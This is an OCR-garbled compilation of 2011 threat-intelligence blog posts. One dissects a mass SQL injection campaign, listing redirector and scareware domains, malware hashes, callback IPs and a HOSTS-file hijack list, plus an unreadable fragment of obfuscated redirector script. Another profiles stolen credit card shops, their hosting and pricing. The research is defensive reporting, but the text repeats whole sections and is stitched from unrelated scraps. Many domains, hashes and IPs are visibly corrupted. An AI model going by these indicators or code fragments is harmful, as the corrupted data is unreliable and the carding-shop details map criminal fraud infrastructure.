MD5 : 4387f9be5af4087d21c4b44b969a870f 

SHA1 : 8a47842ccf6d642043ee8db99d0530336eef6b99 

SHA256: 

975e62feld9415b9fa06e8f826f776ef851bd030c2c897bc3fb 

ee207519f8351 

The redirections take place as follows: 

• bookzula.com/ur.php 

-> 

www3.topasarmy.in/?w4q593n= 

Email: 

bill.swinson@yahoo.com 

-> 

firstrtsca ner. rr. nu 

• nbnjkl.com/urchin.js -> power-wfchecker.in/? 
Idlia916= - Email: bill.swinson@yahoo.com 

bill.swinson@yahoo.com has also been used to register the 
following scareware-serving domains: 



uberble-safe.in 


uberate-safe.in 

best-jsentinel.in 

topantivir-foru.in 

personalscannerlg.in 

rideusfor.in 

ha rdbsy-network. i n 

enablesecureum.in 

hardynauchecker.in 

best-jsentinel.in 

smartklhdefense.in 

smartaasecurity.in 

personal-scan-4u.in 

unieve-safe.in 

safe-solutionsoft.in 

hugeble-cure.in 

topsecuritykauu.in 

personalcleansoft.in 

powerscanercis.in 

topksfsecurity.in 



hard-antivirbjb.in 

strong-guardbxz.in 

smart-suiteguard.in 

thebestkrearmy.in 

smart-guardianro.in 

freeopenscanerpo.in 

best-networkqjo.in 

hard-antivirbjb.in 

smartantivir-scanner.in 
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piukan 1242 videos * SuDicn:* 



most-popularsoftcontent.in 

bester-msecuriity.in 


doneahme.in 










strong-checkerwrt.in 

safepowerforu.in 

safe-securityarmy.in 

personal-bpsentinel.in 

personalcleansoft.in 

ostestsyste m r i. i n 

saveinternet-guard.in 

just-perfectprotection.in 

firstholdermvq.in 

just-perfectprotection.in 

allcle-safe.in 

brawaidme.in 

uniind-safe.in 

moreaz-fine.in 

trueeox-safe.in 

safexanet.in 

personal-internet-foryou.in 

For the time being, the campaing is redirecting to a fake 
YouTube page enticing users into downloading a bogus 

Adobe Flash player in order to view the video. 



Detection rate for the bogus Adobe Flash player: 

scandisk.exe - [8]Backdoor:Win32/Simda.A - 8/43 (18.6 
%) 

MD5 : fb4c93935346d2d8605598535528506e 

SHA1 : 0ff7ccd785c0582e33c22f9b21156929ba7abaeb 

SHA256: 

b204586cbacl60663736Idd788b691f342cblc582d106902 
09a989b040dab632 

Upon execution the sample phones back to: 
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209.212.147.141/chrome/report, html 

98.142.243.64/chrome/report, html 

update.19runsl0q3.com - 65.98.83.115 

The same phone back locations have been used in a variety 
of related malware - thanks to Kaspersky's David 

Jacoby for the ping. For instance, in [9]this malware 
sample that's also phoning back to the same URLs, we have 
active FIOSTS file modification as follows: 

See related post: [10] Sampling Malicious Activity Inside 
Cybercrime-Friendly Search Engines 

www. google, com. =87.125.87.99; 

google, com. =87.125.87.103; 

google, com.au. =87.125.87.104; 



www. google, com.au. =87.125.87.147; 
google, be. = 77.125.87.148; 
www. google, be. =77.125.87.149; 
google, com. br. = 77.125.87.109; 
www. google, com.br. = 77.125.87.150; 
google, ca. =77.125.87.152; 
www. google, ca. = 77.125.87.153; 
google, ch. = 77.125.87.155; 
www. google, ch. = 77.125.87.158; 
google, de. = 77.125.87.160; 
www. google, de. = 77.125.87.161; 
google, dk. =92.125.87.123; 
www. google, dk. =92.125.87.160; 
google, fr. =92.125.87.154; 
www. google, fr. =92.125.87.134; 
google, ie. =92.125.87.170; 
www. google, ie. =92.125.87.177; 
google, it. =92.125.87.173; 
www. google, it. =92.125.87.14 7; 
google, co.jp. =92.125.87.103; 



www. google, co.jp. =84.125.87.147; 
google, nl. =84.125.87.103; 
www. google, nl. =84.125.87.14 7; 
google, no.=84.125.87.103; 
www. google, no. =84.125.87.14 7; 
google, co. nz. =84.125.87.103; 
www. google, co. nz. =84.125.87.14 7; 
google.pl. =84.125.87.103; 
www.google.pl. =64.125.87.14 7; 
google.se. =64.125.87.103; 
www.google.se. =64.125.87.147; 
google, co. uk. =64.125.87.103; 
www. google, co. uk. =64.125.87.14 7; 
google, co.za. =64.125.87.103; 
www. google, co.za. =64.125.87.147; 
www. google-analytics. com. =64.125.87.101 
www. bing. com. =92.123.68.97; 
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search.yahoo, com. = 72.30.186.249; 
www. search.yahoo, com. = 72.30.186.249; 



uk. search.yahoo, com. =87.248.112.8; 

ca.search.yahoo.com. =100.6.239.84; 

de.search.yahoo.com. =87.248.112.8; 

fr. search.yahoo, com. =87.248.112.8; 

au.search.yahoo.com. =87.248.112.8; 

ad-emea. doubleclick, net. =64.125.87.101; 

www.statcounter. com. =64.125.87.101; 

[11] The Lizamoon mass SQL injection connection 

The same email used to register the SQL injected domains 
jamesnorthone@hotmailbox.com has been used to 

register the Lizamoon mass SQL injection attack domains 
extensively profiled here - "[12]Dissecting the Massive 
SQL 

Injection Attack Serving Scareware 
Related posts: 

• [13]SQL Injection Through Search Engines Reconnaissance 

• [14]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

• [15]Massive SQL Injection Attacks - the Chinese Way 

• [16]Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 

• [17]GoDaddy's Mass WordPress Blogs Compromise Serving 
Scareware 



• [18]Dissecting the WordPress Blogs Compromise at 
Network Solutions 

• [19]Yet Another Massive SQL Injection Spotted in the Wild 

• [20]Smells Like a Copycat SQL Injection In the Wild 

• [21]Fast-Fluxing SQL Injection Attacks 

• [22]Obfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [23]Dancho 
Danchev's blog. Follow him [24]on Twitter. 

1. http://www.zdnet.com/blo a /securitv/over-a-million-web- 
sites-affected-in-mass-sql-in i ection-attack/9662 

2. http://i.zdnet.com/blo a s/mass_sql_in i ection_attack. pna 

3. http://ddanchev.blo as pot.com/2007/Q7/sal-in i ection- 
throu a h-search-en a ines.html 

4. http://ddanchev.blo as pot.com/2009/Q4/massive-sq l- 
ini ections-throu a h-search.html 

5. http://blo a .armorize.com/2011/10/htt piia huicomurchin is- 
mass-infection.html 

6. http://ddanchev.blo as pot.com/2011/Q3/dissectin a- 
massive-sal-in i ection-attack.html 

7. 

http://www.virustotal.com/file-scan/report.html? 

id = 975e62feld9415b9fa06e8fS26f776ef8 f .. j ■ 0c2cMZb 

c3fbee2 


07 519f83 51-1318924415 





































8 . 


http://www.vi rustotal.com/file-scan/report.html? 
i d = b2Q4586cbacl 60663 736 Idd788b691f342cblc582d 106 

90209a989 

b040dab632-l319047251 


9. http://oastebin.com/EEHVb6ux 

10. http://ddanchev.blo as pot.com/2010/07/samolin a- 
malicious-activitv-inside.html 
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11. http://ddanchev.blo as pot.com/2011/03/dissectin a- 
massive-sql-in i ection-attack.html 

12. http://ddanchev.blo as pot.com/2011/03/dissectin a- 
massive-sal-in i ection-attack.html 

13. http://ddanchev.blo as pot.com/2007/Q7/sal-in i ection- 
throu a h-search-en a ines.html 

14. http://ddanchev.blo as pot.com/2009/Q4/massive-sa l- 
im ections-throu a h-search.html 

15. http://ddanchev.blo as pot.com/20Q8/10/massive-sa l- 
inj ect i orvatta c ks-c h ii n ese. h t m I 

16. http://ddanchev.blo as pot.com/2010/07/cvbercriminals- 
sa l-in i ect-cvbercrime.html 

17. http://ddanchev.blo as pot.com/2010/Q4/ a odaddvs-mass- 
wordpress-blo a s.html 

18. http://ddanchev.blo as pot.com/2010/Q4/dissectin a- 
wordpress-blo a s-compromise.html 






















































19. http://ddanchev.blo as pot.com/2008/Q5/vet-another- 
massive-sal-in i ection.html 


20. http://ddanchev.blo as pot.com/2008/Q7/smells-like- 
cop vcat-sql-in i ection-in.html 

21. http://ddanchev.blo as pot.com/2008/Q5/fast-f1uxin a -sq l- 
ini ection-attacks.html 

22. http://ddanchev.blo as pot.com/2008/Q7/obfuscatin a -fast- 
fiuxed-sal-in i ected.html 

23. http://ddanchev.blo as pot.com/ 

24. http://twitter.com/danchodanchev 
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HTTP/l.l 200 OK 

Date: Wed, 19 Oct 2011 11:24:05 GMT 

Server: Apache/2.2.19 OAV/2 Pyjy S.3.6 mod fff /2.2.19 Qa®c6Sj0.9-8q 

last-Mod*ed: Wed, 19 Oct 2011 11 :20:03 GMT 
Etofl: *2t) 1486e-l<Ja8-4afa50577lecO* 

Accept-ftanges: bytes 
Content length: 7592 
Cormeebon: dose 

Content-Type: aoofaabon ^yvoyyipt 

v» *£-[*78742% *78742*, *78835*, *78843*. *7882r, *78846*. *78843*, *78784*. *78793*, *78784% *78771*. *78836*, *78848*. *78848% *78844*. *78790% *78779*. *78779% *7885 
var temp-’; 
var QQ-% 

for (i-O; Kjfc.length; i++){ 

aa-sEfl-WTO; 

ttro-tBno+SIrno. franCharCndeftxri : 

> 

exdftw'p); 
























bookfulacom 


bookgusa.com 


bookwlacom 


bookzulacom 


A <^ 146 185248 3 


" ET 146185.248 0/24 ** AS43134 


viftvwtiledl.com 


CIIAUE 


file ell com 


nbnjkl com 

nbnjkl.com 


Dissecting the Ongoing Mass SQL Injection Attack 
( 2011 - 10-20 23 : 36 ) 

The [l]ongoing mass SQL injection attack, has already 
affected over a [2]million web sites. Cybercriminals 
performing [3]active search engines [4]reconnaissance 

have managed to inject a malicious script into ASP ASP.NET 
websites. 

From [5]client-side exploits to bogus Adobe Flash players, 
the campaign is active and ongoing. In this intelligence brief, 
we'll dissect the campaign and establish a direct connection 
between the campaign and last March's 

[6]Lizamoon mass SQL injection attack. 

SQL injected domains - thanks to Dasient's Tufan Demir 
for the ping: 

nbnjki.com/urchin.js - 146.185.248.3 - Email: 
jamesnorthone@hotmailbox.com 


jjghui.com/urchin.js - 146.185.248.3 - Email: 
jamesnorthone@hotmailbox.com 

bookzula.com/ur.php - 146.185.248.3 - Email: 
jamesnorthone@hotmailbox.com 

bookgusa.com/ur.php - 146.185.248.3 - Email: 
jamesnorthone@hotmailbox.com 

dfrgcc.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

statsl.com/ur.php - 111.22.111.111 - Email: 
jamesnorthone@hotmailbox.com 

milapop.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

jhgukn.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 
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vovmml.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

bookvivi.com/ur.php - Email: 
jamesnorthone@hotmailbox.com 

Responding to 146.185.248.3 is also file-dl.com; 

bookfula.com and bookvila.com - Email: 

james- 

northone@hotmailbox.com 

Detection rate for urchin.js: 



urchin.js - [7]Trojan.JS.Redirector - 17/42 (40.5 %) 

MD5 : 4387f9be5af4087d21c4b44b969a870f 

SHA1 : 8a47842ccf6d642043ee8db99d0530336eef6b99 

SHA256: 

975e62feld9415b9fa06e8f826f776ef851bd030c2c897bc3fb 

ee207519f8351 

The redirections take place as follows: 

• bookzula.com/ur.php 

-> 

www3.topasarmy.in/?w4q593n= 

Email: 

bi I l.swi nson@yahoo.com 
-> 

firstrtsca ner. rr. nu 

• nbnjkl.com/urchin.js -> power-wfchecker.in/? 
Idlia916= - Email: bill.swinson@yahoo.com 

bill.swinson@yahoo.com has also been used to register the 
following scareware-serving domains: 

uberble-safe.in 

uberate-safe.in 

best-jsentinel.in 



topantivir-foru.in 

personalscannerlg.in 

rideusfor.in 

ha rdbsy-network. i n 

enablesecureum.in 

hardynauchecker.in 

best-jsentinel.in 

smartklhdefense.in 

smartaasecurity.in 

personal-scan-4u.in 

unieve-safe.in 

safe-solutionsoft.in 

hugeble-cure.in 

topsecuritykauu.in 

personalcleansoft.in 

powerscanercis.in 

topksfsecurity.in 

hard-antivirbjb.in 

strong-guardbxz.in 

smart-suiteguard.in 



thebestkrearmy.in 

smart-guardianro.in 

freeopenscanerpo.in 

best-networkqjo.in 

hard-antivirbjb.in 

smartantivir-scanner.in 
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Emma Watson never seen before home video 



most-popularsoftcontent.in 


bester-msecuriity.in 

doneahme.in 

strong-checkerwrt.in 

safepowerforu.in 

safe-securityarmy.in 










personal-bpsentinel.in 

personalcleansoft.in 

ostestsyste m r i. i n 

saveinternet-guard.in 

just-perfectprotection.in 

firstholdermvq.in 

just-perfectprotection.in 

allcle-safe.in 

brawaidme.in 

uniind-safe.in 

moreaz-fine.in 

trueeox-safe.in 

safexanet.in 

personal-internet-foryou.in 

For the time being, the campaing is redirecting to a fake 
YouTube page enticing users into downloading a bogus 

Adobe Flash player in order to view the video. 

Detection rate for the bogus Adobe Flash player: 

scandisk.exe - [8]Backdoor:Win32/Simda.A - 8/43 (18.6 
%) 

MD5 : fb4c93935346d2d8605598535528506e 



SHA1 : 0ff7ccd785c0582e33c22f9b21156929ba7abaeb 
SHA256: 

b204586cbacl60663736Idd788b691f342cblc582d106902 
09a989b040dab632 

Upon execution the sample phones back to: 
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209.212.147.141/chrome/report, html 

98.142.243.64/chrome/report, html 

update.19runsl0q3.com - 65.98.83.115 

The same phone back locations have been used in a variety 
of related malware - thanks to Kaspersky's David 

Jacoby for the ping. For instance, in [9]this malware 
sample that's also phoning back to the same URLs, we have 
active HOSTS file modification as follows: 

See related post: [10] Sampling Malicious Activity Inside 
Cybercrime-Friendly Search Engines 

www. google, com. =87.125.87.99; 

google.com. =87.125.87.103; 

google, com.au. =87.125.87.104; 

www. google, com.au. =87.125.87.147; 

google, be. = 77.125.87.148; 

www.google.be. =77.125.87.149; 

google, com. br. = 77.125.87.109; 



www. google, com.br. = 77.125.87.150; 
google, ca. = 77.125.87.152; 
www. google, ca. = 77.125.87.153; 
google, ch. = 77.125.87.155; 
www. google, ch. = 77.125.87.158; 
google, de. = 77.125.87.160; 
www. google, de. = 77.125.87.161; 
google, dk. =92.125.87.123; 
www. google, dk. =92.125.87.160; 
google, fr. =92.125.87.154; 
www. google, fr. =92.125.87.134; 
google, ie. =92.125.87.170; 
www. google, ie. =92.125.87.177; 
google, it. =92.125.87.173; 
www. google, it. =92.125.87.147; 
google, co.jp. =92.125.87.103; 
www. google, co.jp. =84.125.87.147; 
google, nl. =84.125.87.103; 
www. google, nl. =84.125.87.14 7; 
google, no.=84.125.87.103; 



www. google, no. =84.125.87.14 7; 
google, co. nz. =84.125.87.103; 
www. google, co. nz. =84.125.87.14 7; 
google.pl. =84.125.87.103; 
www.google.pl. =64.125.87.147; 
google.se. =64.125.87.103; 
www.google.se. =64.125.87.147; 
google, co. uk. =64.125.87.103; 
www. google, co. uk. =64.125.87.14 7; 
google, co.za. =64.125.87.103; 
www. google, co.za. =64.125.87.147; 
www. google-analytics. com. =64.125.87.101 
www. bing. com. =92.123.68.97; 
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search.yahoo, com. = 72.30.186.249; 
www. search.yahoo, com. = 72.30.186.249; 
uk. search.yahoo, com. =87.248.112.8; 
ca.search.yahoo.com. =100.6.239.84; 
de. search.yahoo, com. =87.248.112.8; 
fr. search.yahoo, com. =87.248.112.8; 



au.search.yahoo.com. =87.248.112.8; 
ad-emea. doubleclick, net. =64.125.87.101; 
www.statcounter. com. =64.125.87.101; 

[11] The Lizamoon mass SQL injection connection 

The same email used to register the SQL injected domains 
jamesnorthone@hotmailbox.com has been used to 

register the Lizamoon mass SQL injection attack domains 
extensively profiled here - "[12]Dissecting the Massive 
SQL 

Injection Attack Serving Scareware 
Related posts: 

• [ 13]SQL Injection Through Search Engines Reconnaissance 

• [14]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

• [15]Massive SQL Injection Attacks - the Chinese Way 

• [16]Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 

• [17]GoDaddy's Mass WordPress Blogs Compromise Serving 
Scareware 

• [18]Dissecting the WordPress Blogs Compromise at 
Network Solutions 

• [19]Yet Another Massive SQL Injection Spotted in the Wild 

• [20]Smells Like a Copycat SQL Injection In the Wild 



• [21 ]Fast-FIuxing SQL Injection Attacks 

• [22]Obfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [23]Dancho 
Danchev's blog. Follow him [24]on Twitter. 

1. http://www.zdnet.com/blo a /securitv/over-a-million-web- 
sites-affected-in-mass-sal-in i ection-attack/9662 

2. http://i.zdnet.com/blo a s/mass sal in j ection attack. pna 

3. http://ddanchev.blo as pot.com/2007/Q7/sal-in i ection- 
throu a h-search-en a ines.html 

4. http://ddanchev.blo as pot.com/2009/04/massive-sq l- 
ini ections-throu a h-search.html 

5. http://blo a .armorize.com/2011/10/htt piia huicomurchin is- 
mass-infection.html 

6. http://ddanchev.blo as pot.com/2011/Q3/dissectin a- 
massive-sal-in i ection-attack.html 

7. 

http://www.virustotal.com/file-scan/report.html? 

id = 975e62feld9415b9fa06e8f82Sf776ef851bd030c2c897b 

c3fbee2 

07 519f83 51-1318924415 

8 . 

http://www.virustotal.com/file-scan/report.html? 

id = b204588cbacl606637361dd788b691f342cblc582dl06 

90209a989 








































b040dab632-l319047251 


9. http://pastebin.com/EEHVb6ux 

10. http://ddanchev.blo as pot.com/2010/07/samplin a- 
malicious-activitv-inside.html 
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11. http://ddanchev.blo as pot.com/2011/Q3/dissectin a- 
massive-sal-in i ection-attack.html 

12. http://ddanchev.blo as pot.com/2011/Q3/dissectin a- 
massive-sql-in i ection-attack.html 

13. http://ddanchev.blo as pot.com/2007/Q7/sal-in i ection- 
throu a h-search-en a ines.html 

14. http://ddanchev.blo as pot.com/2009/04/massive-sq l- 
ini ections-throu a h-search.html 

15. http://ddanchev.blo as pot.com/20Q8/10/massive-sa l- 
in j ection-attacks-chinese.html 

16. http://ddanchev.blo as pot.com/2010/07/cvbercriminals- 
sa l-in i ect-cvbercrime.html 

17. http://ddanchev.blo as pot.com/2010/Q4/ a odaddvs-mass- 
wordpress-blo a s.html 

18. http://ddanchev.blo as pot.com/2010/Q4/dissectin a- 
wordpress-blo a s-compromise.html 

19. http://ddanchev.blo as pot.com/2008/Q5/vet-another- 
massive-sql-in i ection.html 

20. http://ddanchev.blo as pot.com/2008/Q7/smells-like- 
cop vcat-sal-in i ection-in.html 






























































21. http://ddanchev.blo as pot.com/2008/Q5/fast-f1uxin a -sa l- 
ini ection-attaeks.html 

22. http://ddanchev.blo as pot.com/2008/Q7/obfuscatin a -fast- 
f1uxed-sql-in i ected.html 

23. http://ddanchev.blo as oot.com/ 

24. http://twitter.com/danchodanchev 
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Exposing the Market for Stolen Credit Cards Data 
( 2011 - 10-31 02 : 07 ) 

What's the [l]average price for a stolen credit card? 
How are [2]prices shaped within the cybercrime 

ecosystem? 

Can we talk about [3]price discrimination within the 
underground marketplace? Just how easy is to purchase 
stolen credit cards known as dumps or full dumps, 
nowadays? 

In this intelligence brief, I will expose the market for stolen 
credit cards data, by profiling 20 currently active 

and responding gateways for processing of fraudulently 
obtained financial data. 















Key summary points: 


• Tens of thousands of stolen credit cards a.k.a. dumps and 
full dumps offered for sale in a DIY market fashion 

• The majority of the carding sites are hosted in the Ukraine 
and the Netherlands 

• Liberty Reserve is the payment option of choice for the 
majority of the portals 

• Four domains are using Yahoo accounts and one using 
Live.com account for domain registration 

• Four of the domains are using identical name servers 

• Each DIY gateway for processing of fraudulently obtained 
financial data has a built-in credit cards checker or 

offers links to external sites performing the service 

• Several of the fraudulent gateways offered proxies-as-a- 
service, allowing cybercriminals to hide their real IPs by 

using the malware infected hosts as stepping stones 

The dynamics of the cybercrime ecosystem share the same 
similarities with that of a legitimate marketplace. From 

seller and buyers, to bargain hunters, escrow agents, 
resellers and vendors specializing in a specific market 
segment, all the market participants remains active 
throughout the entire purchasing process. With ZeuS and 
SpyEye crimeware infections proliferating, it's shouldn'd be 
surprising that the average price for a stolen credit card is 
decreasing. 



With massive dumps of credit card details in the hands of 
cybercriminals, obtained through [4]ATM skimming and 
crimeware botnets, the marketplace is getting over-crowded 
with trusted propositions for stolen credit card details. 

What used to be a market where over-the-counter trade was 
the primary growth factor, is today's highly standardized 

marketplace with DIY online interfaces, allowing anyone to 
join and purchase stolen credit card details. Naturally, the 
vendors of dumps and full dumps are vertically integrating 
within the marketplace, and are offering additional services 
such as checkers for credit cards validity, and proxies-as-a- 
service - [Sjcompromised malware infected hosts - 
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allowing a potential cybercriminal to opportunity to hide 
their IP while using the recently purchased credit cards data. 

How are prices shaped within this new and standardized 
market model offered commodity goods such as 

stolen credit cards, and is price discrimination for the stolen 
credit cards even feasible? The vendors are currently offered 
fixed prices for the majority of credit cards, with slight 
increases in the price of a stolen credit card, if the card is 
Premium. Bulk orders are naturally also considered as a 
growth factor the DIY interfaces, with slight discounts being 
offered for bulk orders. 

As far as [6]price discrimination is concerned, the concept 
is long gone, and has become the victim of this ongoing 
standardization of the market. The same goes for penetration 
pricing, as the vendors of stolen credit cards 



details are now enjoying a better underground market 
transparency into the fraudulent propositions of competing 

portals, helping them to set the prices more easily, without 
the need to lower the price in order to enter the market 
segment. 

Let's profile the 20 gateways for processing of fraudulently 
obtained financial data. 

Responding IPs, registered emails, name servers, 

ASs, associated ICQ numbers, geolocation of the 
hosting IP 

is as follows: 

ccmall.cc - 213.5.70.34 - Name server: TRl.ONLINESHOP.SU 
- Email: gwylhcfktm@whoisservices.cn - AS49544, 

INTERACTIVE3 D-AS - HOSTED IN THE NETHERLANDS 

track2.name - 91.213.175.121 - AS6849, UKRTELNET JSC 
UKRTELECOM - HOSTED IN UKRAINE 

trackstore.su - 46.21.148.26 - Email: 

roger.sroy@yahoo.com - AS35017, SWIFTWAY-AS - HOSTED IN 
THE NETHER¬ 
LANDS 

magic-numbers.cc - 91.213.175.89; 

91.223.77.35 Name server: 

NS1.1000DNS.NET- Email: 


con- 



tact@privacyprotect.org - AS6849, UKRTELNETJSC 
UKRTELECOM - HOSTED IN UKRAINE 

allfresh.us - 46.21.144.115 - Name server: 
YNSl.YAHOO.COM - Email: keikomiyahara@yahoo.com - 
AS35017, 

SWIFTWAY-AS - HOSTED IN THE NETHERLANDS 
freshstock.biz - 38.97.225.166; 

69.175.73.184 - Name server-NSl.PIPEDNS.COM Email: 
ghmbfvn- 

txs@whoisprivacyprotect.com - AS32475, SINGLEHOP , Inc. - 
HOSTED IN THE UNITED STATES 

bulba.cc - 91.223.77.254 - Name server: 
NS1.NAMESELF.COM - Email: bulbacc@yahoo.com - AS6849, 
UKRTELNET 

JSC UKRTELECOM - HOSTED IN UKRAINE 

approven.su - 91.229.248.20 - Name server: 
dnsl.naunet.ru - Email: yurtan20@el.ru - HOSTED IN 
UKRAINE 

cv2shop.com 


72.20.12.205 


Name 



server: 


DNS1.NAME-SERVICES.COM 


Email: 

wn- 

fxgjdg@whoisprivacyprotect.com - AS25761, STAMINUS- 
COMM - HOSTED IN THE UNITED STATES 

vzone.tc - 49.212.25.242 - Name server: dnsl.yandex.ru - 
Email: adamsnames@rrpproxy.net - AS9371, SAKURA-C 

SAKURA Internet - HOSTED IN JAPAN 

ccStore.ru - 91.220.101.200 - Name server: 
nsl.1000dns.net - Email: ccstoreru@yahoo.com - AS49704 - 
HOSTED IN 

THE NETHERLANDS 

dumps.cc redirects to privateservices.ws and 
trackservices.ws - 124.217.247.59 - Name server: 
NS1.IPSTATES.NET- 

Email: dumps.cc@domainsproxy.net - AS45839, PIRADIUS-AS 
PIRADIUS NET - HOSTED IN MALAYSIA 

privateservices.ws - 217.23.9.92 - Name server: 
nsl.servicedns.nl - AS49981, WorldStream AS Maasdijk - 
HOSTED IN 


THE NETHERLANDS 



perfect-numbers.cc - 91.220.101.75 - Name server: 
NS1.1000DNS.NET - AS49704, ADDOS-AS FOP Litvinenko 
Sergey 

Nikolaevich; icq: 605099359 - HOSTED IN THE 
NETHERLANDS 

mega4u.biz - 178.162.174.71 - Name server: 
NS1.FREEDNS.WS - Email: persiks@online.ua - AS28753, 
LEASEWEB-DE 

- HOSTED IN GERMANY 

accessltd.ru - 91.213.175.167 - Name server: 
nsl4.zoneedit.com - Email - admin@accessltd.ru - AS6849, 
UKRTELNET 

JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - 
HOSTED IN UKRAINE 

pwnshop.cc - 77.79.13.209 - Name server: 
NS1.AFRAID.ORG - AS16125, DC-AS UAB - HOSTED IN 
LITHUANIA 

bestdumps.su - 91.213.175.57 - Name server: 
nsl.1000dns.net - Email: bestdumpssu@live.com ICQ : 
619429330 - 
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Home [ Search Cards l Checkout I Mvorders I Balance: So.oo I Support I Account I Service Rules ] Help I Logou 


Load funds: 

Liberty Reserve: I I Ip.yil 


Statistic: 

Out of stock. 

—> 


Cw 


Country Price 

Qt. 

AS 

Siooo 

1 

Au 

SS.oo 

12 

Be 

Siooo 

1 

Br 

$ 7,00 

93 

Ca 

$7,00 

6 

Cn 

$10,00 

2 

Co 

$10,00 

1 

Es 

$10,00 

1 

Fr 

$10,00 

1 

Gb 

$9,00 

1 

In 

$5,00 

7 

Kr 

$8,00 

1 

Mx 

$10,00 

2 

N1 

$10,00 

2 

Si 

$ 7,00 

1 

Rj 

Sio,oo 

2 

Sa 

Sio-oo 

1 

Tr 

S6,oo 

19 

Ck 

$ 9,00 

122 


AS6849, UKRTELNET JSC UKRTELECOM - HOSTED IN UKRAINE 

mycc.su - 188.93.17.180 - Name server: 
nsl.deltahost.com.ua - Email: admin@mycc.su - AS49505, 
SELECTEL Ltd. - 

HOSTED IN RUSSIA 

bestdumps.biz - 195.3.145.87 - Name server: 
NS1.BESTDUMPS.BIZ - Email: admin@bestdumps.biz - 
AS50244 - 

HOSTED IN LATVIA, Associated email: bdsupport@jabber.org, 
Associated ICQ: 655584 

dumpshop.bz - 217.23.9.93 - Name server: 
nsl.servicedns.nl - Email: contact@privacyprotect.org; 
AS49981, 














WorldStream; HOSTED IN THE NETHERLANDS 

cardshop.bz - 217.23.9.67 - Name server: nsl.servicedns.nl 

- Email: contact@privacyprotect.org; AS49981, WorldStream; 
HOSTED IN THE NETHERLANDS 

Let's now take an inside view into each and every of the 
above-profiled gateways. 

_accessltd.ru 

Accessltd.ru is currently offering an inventory of 39328 U.S 
based stolen credit card details for just $2.10 each, followed 
by another inventory of 342 U.K based credit cards for $9 
each, and 108 Japanese based credit cards for $8 

each, with another dump of 293 Canadian credit cards for $7 
each, and 198 Australian based credit cards for $8 each. 

According to the service - 11 We accept Liberty Reserve 
only.Refund on your wallets is not possible. " 

Moreover, here's how the service operates based on the 
Service Rules: 

11 To check the card is integrated into the platform checker 
CCChecker, currently the best checker, not only in our 
opinion. Replacement cards are only based on the result of 
this checker. Check Card is available immediately after order 
payment, in the section My Orders. To check, dick "Check". 
Cards checking in for a few seconds. Button "Check" 

- available within 20 minutes after purchase. Check Card - a 
paid service, which costs $ 0.3, if the card is not valid - 

the cost of cards back to your 
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91.213.175.0/24 


AS 


AS6849 


91213175 167 


MET 


MS 


^^accessltdju"^^ 


nsl92oneeclrtcom 


uf 


216 227 210 10 


209 126 137 108 A 


ftp nsl4;oneedil com 


MET 


209126128 0/17 


AS10439 


NET 216 227 210 0/24 

PTR 

dM)0012 lunarseivers com 


AS15244 


account automatically. 

Replacement card can only be made in the automatic mode. 
If checker dont working, for replace need screens 

your checker in the Support section with a description of the 
problem. These tickets will only be considered if they contain 
the results of your test, not a "paid for Skype, did not work, 
replace". We do not care where and how you use the 
material, loading support extra information is needed. We will 
check the card manually, and if any parameter is not correct 
to make you refund. Sorting: 

Our shop is available sorted by the following parameters: 

1. BIN ( Multiple) 

2. State (Multiple) 

3. City (Multiple) 

4. Zip (Multiple)'' 

Domain reconnaissance 

accessltd.ru - 91.213.175.167 - Name server: 
nsl4.zoneedit.com - Email - admin@accessltd.ru - AS6849, 
UKRTELNET 




JSC UKRTELECOM, 18, Shevchenko blvd. Kiev, Ukraine - 
HOSTED IN UKRAINE 

AIIFresh.us 

AIIFresh.us is yet another DIY shop for purchasing stolen 
credit card details, all fresh as the name says. 

On 2011/08/04 the service issued updates for 11 updated US 
Amex, Discover fresh and good", followed by another 
update on the next day, this time advertising " updated more 
cvv Fra rich e new and good today. " 

The price for a stole card number is static and is $6 per credit 
card. 
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fly Account I FAQ | Log Out 


OEPOSIT FAIL ? 


Welcome 

Your Budget: 0 $ 





zon al-os updated more ccv FRANCE new and good today 

Dear! customers we updated ccv FRANCE veery good and fresh, and very cheap ! thanks, 



ion-osot 19:02:39, updated US amex , discover FRESH and GOOD 

Dear Customers, we update US amex and discover very good on Agent Adam, thanks! 
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ITEMS: 0 
ITEMS: 0$ 


Checkout 



4 


4 


4 


4 


4 


4 


4 


4 


4 


Canada 


Canada 


Canada 


Canada 


Canada 


Canada 


Canada 


Canada 


Canada 


AB 

BC 

NB 

NS 

NS 

NS 

NS 

NS 

NS 


SHERWOOD T8A6L7 

PARK 

NANAIMO V9T 2K3 

SAINT JACQUES E7B1R7 

HALIFAX B3M1C5 

HALIFAX B3M2E8 

HALIFAX B3M3L8 

HALIFAX B3N3L2 

STILLWATER B3Z1G7 

LAKE 

TIMBERLEA B3T1E3 


6 s Buy V 

6 s Buy *■ 

6 s Buy *■ 

6 s Buy ♦ 

6 $ Buy 5 

6 s Buy T 

6 s Buy 9 

6 s Buy *■ 

6 s Buy *■ 


Domain reconnaissance 
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NS 


ynslyahoo.com 


PTP 


UP US 


A 

A 


ns8 san yahoo.com 


4621 144 115 


NS 


yns2yahoo.com 


^^Hfresh.us 


ux 


ns9.san.yahoo.com 


aspmx5 googlemail com 

IIX 

aspmx l google.com 


PTR 

vw-in-f27.lel00.net 

U' 

altl aspmx I google.com 

ux 

aspmx4 googlemail.com 


A 


UX 


ey in-127 lelOO.net 

FTP 


alt2.aspmx.l google com 

ux 

aspmx3 googlemail.com 


A 

A 


98.136 43.32 MET 98.136 40.0/21 ** AS36752 


46 21144 0/20 AS35017 

98139.247 192 HET 98 139.128 0/17 ** AS26101 


gyin-f27. Iel00.net 

PTR 

74 125 157 27 * MET 74 125 156 0/23 


74 125 113 27 - MET 74 125 112 0/23 


dyin-f27.1ei00 net 

PTR 

209 85.143 27 - N ^ T 209 85,142 0/23 AAS 

-AS ” 

as AS15169 

20985.229.27 - N 5- 209 85.228.0/23 


ww-lnl27.lel00.net 


74.125 79 27 NET 74.125.78.0/23 


74.125.127.27 ” R pz in f27.1el00 net 

NET 

74 125 126 0/23 


